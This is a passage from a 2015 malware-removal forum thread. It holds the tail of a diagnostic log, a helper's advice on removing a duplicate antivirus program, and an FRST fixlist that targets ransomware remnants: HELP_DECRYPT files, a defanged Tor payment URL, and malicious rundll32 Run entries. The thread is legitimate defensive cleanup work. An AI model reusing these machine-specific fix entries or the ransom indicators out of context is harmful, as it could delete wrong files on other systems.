   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
 
==================== Memory info =========================== 
 
Processor: AMD E1-1200 APU with Radeon™ HD Graphics
Percentage of memory in use: 33%
Total physical RAM: 3660.08 MB
Available physical RAM: 2427.64 MB
Total Pagefile: 4060.08 MB
Available Pagefile: 2657.52 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.06 GB) (Free:382.85 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Recovery Image) (Fixed) (Total:19.78 GB) (Free:2.47 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive f: () (Removable) (Total:7.44 GB) (Free:6.38 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: D370BA94)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================

 


  • 0

#4
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

I hit the submit button twice, sorry about that, cleared that extra text out


Edited by allforhimblog, 21 February 2015 - 11:07 PM.

  • 0

#5
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts
First Cleanup Step >>>>

==> Multiple Antivirus Programs Installed <==

In checking the logs you have posted, it seems you have multiple antivirus programs installed on your system. From the logs it looks like the following is on your system:
  • Norton Internet Security- from the data in the logs, this is an disabled but up to date version of a paid product
  • Avast Free Antivirus- this program seems to be loading also at system start up
Why is this BAD?
This is not an advisable situation for several reasons; slowdown of your system because of the drain of resources for the additional scanners, conflicts of the real-time scanners to access the same object for scanning, multiple exceptions that have to be made for the various scanners to even try to function on the same system. The end result is this is a case of "more actually equals less"; you are less protected with multiple Antivirus programs (those with real-time scanning always enabled) than just a single Antivirus program.

What to do now
First, check to see if any of the paid products are still current / not expired.

Next, decide on which program stays and which programs to uninstall.

IF any of the paid antivirus software is NOT expired, you are safe to choose one of those. Non-expired subscriptions will still get current AV definitions and have the scanning functions active; expired subscriptions do not get current definitions and the scanners are de-activated, so you are unprotected with expired subscriptions.

IF all of the paid subscription software is expired, a Free software solution is preferred to none at all (expired subscription software is the same (at best) as none at all; you are not protected with an expired subscription for a paid antivirus software). We recommend a FREE solution (Avast! free) because we want users to be protected; the FREE version doesn't have a subscription that expires (and leaves the user un-protected), uses less resources on the user's system (it doesn't include all the extras that the paid versions of Avast do) but still offers a good level of protection from virus and malware.

How do I get back to being protected?
Basically, you should uninstall one of the two programs and use any cleanup uninstall utility program those vendors provide to make sure there are no left-over remains (registry entries, files, drivers, etc.) on your system. This will remove any possible interference of the two uninstalled programs to the security program that remains. Because some of the cleanup utilities ask you to run them in Safe Mode (which does not have network access) you should download them first before starting the uninstalling processes.

Step 1 - Download the Uninstall / clean up utilities (save the file(s) on your desktop): You only need to download the utility for the programs you want to uninstall; I listed all three here for your convenience.



Step 2 - Uninstall the programs you don't want to keep - using the standard uninstall process followed by the uninstall utility

When you have finished with the removal steps (removing one of the two antivirus programs and running their cleaning utilities), please restart your system.


Second Cleanup Step >>>>

Run a FRST Fixlist script

Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt



start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
C:\Users\Dorothy01\AppData\Local\acikmao.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe"
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> No File
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No File
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\????
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
